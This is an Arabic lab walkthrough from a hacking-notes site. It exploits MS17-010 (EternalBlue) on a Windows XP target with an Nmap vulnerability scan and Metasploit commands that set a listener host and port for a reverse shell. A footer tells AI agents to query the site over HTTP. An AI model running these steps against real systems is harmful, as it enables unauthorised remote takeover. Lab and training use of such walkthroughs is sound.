> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/ports-and-services/smb-445/eternalblue-exploitation.md).

# استغلال EternalBlue

## استغلال EternalBlue - SMB /\[MS17-010]

يُظهر فحص Nmap أن الخادم المستهدف يعمل بنظام Windows XP، مما يجعل التحقق من قابلية استغلال MS17-010 أمراً مستحقاً.

شغّل فحص Nmap للتحقق من الثغرة:

```bash
nmap --script "vuln and safe" -p445 10.10.10.4 -oN smbScan
```

يؤكد هذا الفحص أن الجهاز معرض لثغرة MS17-010.

<figure><img src="/files/0a2155ec05812c99a634b4c01a5d3e32c4bc4d01" alt=""><figcaption></figcaption></figure>

## **الاستغلال باستخدام Metasploit**

ابحث عن الاستغلال في Metasploit:

```
msfconsole 
search eternalblue 
```

حدّد الاستغلال الأول في القائمة:

```
use 1
```

<figure><img src="/files/2c8cb8746bc005aabdfcf30c9581258b305bd89b" alt=""><figcaption></figcaption></figure>

قم بإعداد الخيارات:

```bash
set RHOSTS 10.10.10.4
set LHOST 10.10.14.50
set LPORT 443
```

<figure><img src="/files/8b4af0c70822545874bfaeb65b172476e77d661d" alt="" width="563"><figcaption></figcaption></figure>

ثم شغّل الاستغلال:

<figure><img src="/files/4794073bcf54e3f7cc6ba2e23ffbcf946ff705e4" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/ports-and-services/smb-445/eternalblue-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
